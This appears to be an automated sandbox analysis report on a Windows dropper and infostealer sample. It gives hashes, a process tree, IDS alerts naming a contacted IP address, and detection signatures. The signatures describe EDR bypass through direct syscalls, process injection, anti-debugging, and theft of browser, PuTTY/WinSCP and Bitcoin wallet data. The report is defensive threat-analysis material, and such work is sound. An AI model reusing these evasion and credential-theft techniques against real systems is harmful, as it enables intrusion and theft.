
Windows Analysis Report
kXzODlqJak.exe

Overview

General Information

Sample name: kXzODlqJak.exe (renamed because original name is a hash value)
Original sample name: 3785dc3dbc0410893f31c71fa977648063f1e498e28e6783261d81c7ab21c075.exe
Analysis ID: 1586711
MD5: ab79eafcce0d6eff856b259977e480e1
SHA1: 736603a24e9b143a644c1fe3673c7ac7fbeee37c
SHA256: 3785dc3dbc0410893f31c71fa977648063f1e498e28e6783261d81c7ab21c075
Tags: exe, user-crep1x

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found many strings related to Crypto-Wallets (likely being stolen)
Found strings related to Crypto-Mining
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • kXzODlqJak.exe (PID: 7008 cmdline: "C:\Users\user\Desktop\kXzODlqJak.exe" MD5: AB79EAFCCE0D6EFF856B259977E480E1)
    • kXzODlqJak.exe (PID: 6792 cmdline: "C:\Windows\TEMP\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=636 -burn.filehandle.self=632 MD5: 2C6652F7E01283DE091B5200B7878E69)
      • RescueCDBurner.exe (PID: 3772 cmdline: C:\Windows\TEMP\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)
        • RescueCDBurner.exe (PID: 5432 cmdline: C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe MD5: 11C8962675B6D535C018A63BE0821E4C)
          • cmd.exe (PID: 3688 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • LocalCtrl_alpha_v3.exe (PID: 6712 cmdline: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
              • msedge.exe (PID: 964 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
                • msedge.exe (PID: 2264 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2096,i,8130310607339759399,8200688204715788640,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • RescueCDBurner.exe (PID: 5404 cmdline: "C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe" MD5: 11C8962675B6D535C018A63BE0821E4C)
    • cmd.exe (PID: 6408 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • LocalCtrl_alpha_v3.exe (PID: 2856 cmdline: C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe MD5: 967F4470627F823F4D7981E511C9824F)
  • msedge.exe (PID: 2616 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5504 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2772 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 4164 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7120 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3764 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7172 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 6820 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7288 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2025-01-09T14:55:26.263610+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49712 | 104.21.80.52 | 443 | TCP |
| 2025-01-09T14:55:27.755836+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49714 | 104.21.80.52 | 443 | TCP |
| 2025-01-09T14:55:29.238873+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49726 | 104.21.80.52 | 443 | TCP |
| 2025-01-09T14:55:59.854963+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 50002 | 104.21.80.52 | 443 | TCP |
| 2025-01-09T14:56:01.130938+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 50010 | 104.21.80.52 | 443 | TCP |
| 2025-01-09T14:56:02.813321+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 50021 | 104.21.80.52 | 443 | TCP |
| 2025-01-09T14:56:04.940883+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 50036 | 104.21.80.52 | 443 | TCP |
| 2025-01-09T14:56:05.860640+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 50042 | 104.21.80.52 | 443 | TCP |
| 2025-01-09T14:56:06.831955+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 50049 | 104.21.80.52 | 443 | TCP |
| 2025-01-09T14:56:08.305767+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 50060 | 104.21.80.52 | 443 | TCP |
| 2025-01-09T14:56:09.807091+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 50068 | 104.21.80.52 | 443 | TCP |
| 2025-01-09T14:56:11.019877+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 50075 | 104.21.80.52 | 443 | TCP |
| 2025-01-09T14:56:24.536355+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 50094 | 104.21.80.52 | 443 | TCP |
| 2025-01-09T14:56:25.966323+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 50095 | 104.21.80.52 | 443 | TCP |
| 2025-01-09T14:56:26.880181+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 50096 | 104.21.80.52 | 443 | TCP |
| 2025-01-09T14:56:27.717800+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 50097 | 104.21.80.52 | 443 | TCP |
| 2025-01-09T14:56:28.857174+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 50098 | 104.21.80.52 | 443 | TCP |
| 2025-01-09T14:56:29.855414+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 50099 | 104.21.80.52 | 443 | TCP |
| 2025-01-09T14:56:31.024826+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 50100 | 104.21.80.52 | 443 | TCP |


AV Detection

Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe, ReversingLabs: Detection: 28%
Source: kXzODlqJak.exe, ReversingLabs: Detection: 44%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\kXzODlqJak.exe, Code function: 0_2_008FED3B DecryptFileW,0_2_008FED3B
Source: C:\Users\user\Desktop\kXzODlqJak.exe, Code function: 0_2_0093A2D0 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,0_2_0093A2D0
Source: C:\Users\user\Desktop\kXzODlqJak.exe, Code function: 0_2_008FDA0E CreateFileW,GetLastError,DecryptFileW,CloseHandle,0_2_008FDA0E
Source: C:\Users\user\Desktop\kXzODlqJak.exe, Code function: 0_2_008FEA4B DecryptFileW,0_2_008FEA4B
Source: C:\Users\user\Desktop\kXzODlqJak.exe, Code function: 0_2_008FDB8F CreateFileW,GetLastError,DecryptFileW,CloseHandle,0_2_008FDB8F
Source: C:\Users\user\Desktop\kXzODlqJak.exe, Code function: 0_2_008FECE9 DecryptFileW,0_2_008FECE9
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe, Code function: 2_2_00F3ED3B DecryptFileW,2_2_00F3ED3B
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe, Code function: 2_2_00F7A2D0 CryptAcquireContextW,GetLastError,CryptCreateHash,GetLastError,CryptHashData,ReadFile,GetLastError,CryptDestroyHash,CryptReleaseContext,GetLastError,CryptGetHashParam,GetLastError,SetFilePointerEx,GetLastError,2_2_00F7A2D0
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe, Code function: 2_2_00F3EA4B DecryptFileW,2_2_00F3EA4B
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe, Code function: 2_2_00F3DA0E CreateFileW,GetLastError,DecryptFileW,CloseHandle,2_2_00F3DA0E
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe, Code function: 2_2_00F3DB8F CreateFileW,GetLastError,DecryptFileW,CloseHandle,2_2_00F3DB8F
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe, Code function: 2_2_00F3ECE9 DecryptFileW,2_2_00F3ECE9
Source: RescueCDBurner.exe, 00000003.00000002.1525753146.000000006C489000.00000002.00000001.01000000.0000000A.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_faf883c4-f

Bitcoin Miner

Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2492926906.000000000802C000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: jsecoin.com/
Source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2492926906.000000000802C000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: coinhive.com/
Source: kXzODlqJak.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP, NET_RUN_FROM_SWAP
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe, File opened: C:\Windows\TEMP\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\msvcr100.dll
Source: kXzODlqJak.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\wix4\wix4\build\burn\Release\x86\burn.pdb source: kXzODlqJak.exe, 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000000.00000000.1464724380.000000000094E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000002.00000002.1794829664.0000000000F8E000.00000002.00000001.01000000.00000005.sdmp, kXzODlqJak.exe, 00000002.00000000.1471861576.0000000000F8E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: ntkrnlmp.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RescueCDBurner.exe, 00000003.00000002.1525111531.000000000A850000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1524976626.000000000A4FE000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586229911.000000000A4E0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586508920.000000000A892000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586052674.000000000A18D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1852720442.00000000059D0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1849688078.0000000005105000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2803897561.000000000428C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RescueCDBurner.exe, 00000003.00000002.1525111531.000000000A850000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1524976626.000000000A4FE000.00000004.00000020.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586229911.000000000A4E0000.00000004.00000800.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586508920.000000000A892000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000004.00000002.1586052674.000000000A18D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1852720442.00000000059D0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.1849688078.0000000005105000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: D:\a\wix4\wix4\build\burn\Release\x86\burn.pdb> source: kXzODlqJak.exe, 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000000.00000000.1464724380.000000000094E000.00000002.00000001.01000000.00000003.sdmp, kXzODlqJak.exe, 00000002.00000002.1794829664.0000000000F8E000.00000002.00000001.01000000.00000005.sdmp, kXzODlqJak.exe, 00000002.00000000.1471861576.0000000000F8E000.00000002.00000001.01000000.00000005.sdmp
Source: Binary string: R:\Codes\TXFTNActiveX\TXFTNActiveX\ReleaseUMinDependency\TXFTNActiveX.pdb 0 source: kXzODlqJak.exe, 00000002.00000002.1795877329.000000006D0C1000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: R:\Codes\TXFTNActiveX\TXFTNActiveX\ReleaseUMinDependency\TXFTNActiveX.pdb source: kXzODlqJak.exe, 00000002.00000002.1795877329.000000006D0C1000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local StateO source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2311847799.000000000050C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A58314 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: msvcr100.i386.pdb source: RescueCDBurner.exe, RescueCDBurner.exe, 00000003.00000002.1525283070.000000006C0C1000.00000020.00000001.01000000.0000000E.sdmp, RescueCDBurner.exe, 00000004.00000002.1587284521.000000006B0A1000.00000020.00000001.01000000.00000017.sdmp
Source: Binary string: msvcp100.i386.pdb source: RescueCDBurner.exe, 00000003.00000002.1525430639.000000006C311000.00000020.00000001.01000000.0000000D.sdmp, RescueCDBurner.exe, 00000004.00000002.1587494313.000000006B161000.00000020.00000001.01000000.00000016.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local Statez source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2311847799.000000000050C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2311847799.000000000050C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State> source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: LocalCtrl_alpha_v3.exe, 00000009.00000002.2803897561.000000000428C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: "winload_prod.pdbk source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269021296.000000000052B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: E:\PassNow\MagicRescueCD\CD_Win_Burner\Release\RescueCDBurner.pdb0 source: RescueCDBurner.exe, 00000003.00000003.1506304671.000000000AC31000.00000004.00000001.00020000.00000000.sdmp, RescueCDBurner.exe, 00000003.00000002.1511236815.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000003.00000000.1493727358.0000000000AD4000.00000002.00000001.01000000.00000007.sdmp, RescueCDBurner.exe, 00000004.00000002.1581404570.00000000007D4000.00000002.00000001.01000000.00000010.sdmp, RescueCDBurner.exe, 00000004.00000000.1509573314.00000000007D4000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\profiles.ini source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2538008973.00000000004FF000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: LocalCtrl_alpha_v3.exe, 00000009.00000003.2269373802.0000000000510000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2311847799.000000000050C000.00000004.00000001.00020000.00000000.sdmp, LocalCtrl_alpha_v3.exe, 00000009.00000003.2278367535.000000000050C000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: f:\starburn\Bin\LIBCMT\Dynamic\Release\i386\StarBurn.pdb source: RescueCDBurner.exe, 00000003.00000002.1527099049.000000006CFB1000.00000020.00000001.01000000.00000008.sdmp, RescueCDBurner.exe, 00000004.00000002.1590096177.000000006BE01000.00000020.00000001.01000000.00000011.sdmp
Source: C:\Users\user\Desktop\kXzODlqJak.exe, Code function: 0_2_008E5C81 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,0_2_008E5C81
Source: C:\Users\user\Desktop\kXzODlqJak.exe, Code function: 0_2_00931290 FindFirstFileExW,0_2_00931290
Source: C:\Users\user\Desktop\kXzODlqJak.exe, Code function: 0_2_0094343B FindFirstFileW,FindClose,0_2_0094343B
Source: C:\Users\user\Desktop\kXzODlqJak.exe, Code function: 0_2_008FE72A FindFirstFileW,FindNextFileW,FindClose,0_2_008FE72A
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe, Code function: 2_2_00F71290 FindFirstFileExW,2_2_00F71290
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe, Code function: 2_2_00F8343B FindFirstFileW,FindClose,2_2_00F8343B
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe, Code function: 2_2_00F3E72A FindFirstFileW,FindNextFileW,FindClose,2_2_00F3E72A
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe, Code function: 2_2_00F25C81 GetFileAttributesW,GetLastError,SetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,SetFileAttributesW,GetLastError,DeleteFileW,MoveFileExW,MoveFileExW,GetLastError,FindNextFileW,GetLastError,RemoveDirectoryW,GetLastError,MoveFileExW,GetLastError,FindClose,2_2_00F25C81
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe, Code function: 2_2_6D0A0D44 _wcsncpy,_wcsncat,wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,wsprintfW,FindNextFileW,FindClose,2_2_6D0A0D44
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe, Code function: 2_2_6D0A0534 _memset,FindFirstFileW,FindClose,2_2_6D0A0534
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe, Code function: 2_2_6D07B005 _wcsncpy,_wcsncat,wsprintfW,wsprintfW,FindFirstFileW,GetTickCount,GetTickCount,GetTickCount,wsprintfW,GetTickCount,wsprintfW,FindNextFileW,FindClose,2_2_6D07B005
Source: C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe, Code function: 2_2_6D0772FA __EH_prolog3_GS,GetACP,GetACP,GetACP,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,2_2_6D0772FA
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe, Code function: 3_2_6C11CC23 _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,3_2_6C11CC23
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe, Code function: 3_2_6C11C8FD _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,3_2_6C11C8FD
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe, Code function: 3_2_6C0E81A1 _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,3_2_6C0E81A1
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Roaming\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Windows\SysWOW64\cmd.exe, File opened: C:\Users\user\
Source: C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe, Code function: 4x nop then or byte ptr [edi], dh 3_2_6C0D7270
Source: Joe Sandbox View, IP Address: 131.253.33.203
Source: Joe Sandbox View, IP Address: 162.159.61.3
Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 104.21.80.52:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 104.21.80.52:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49726 -> 104.21.80.52:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50002 -> 104.21.80.52:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50010 -> 104.21.80.52:443
Source: Network traffic, Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:50021 -> 104.21.80.52:443
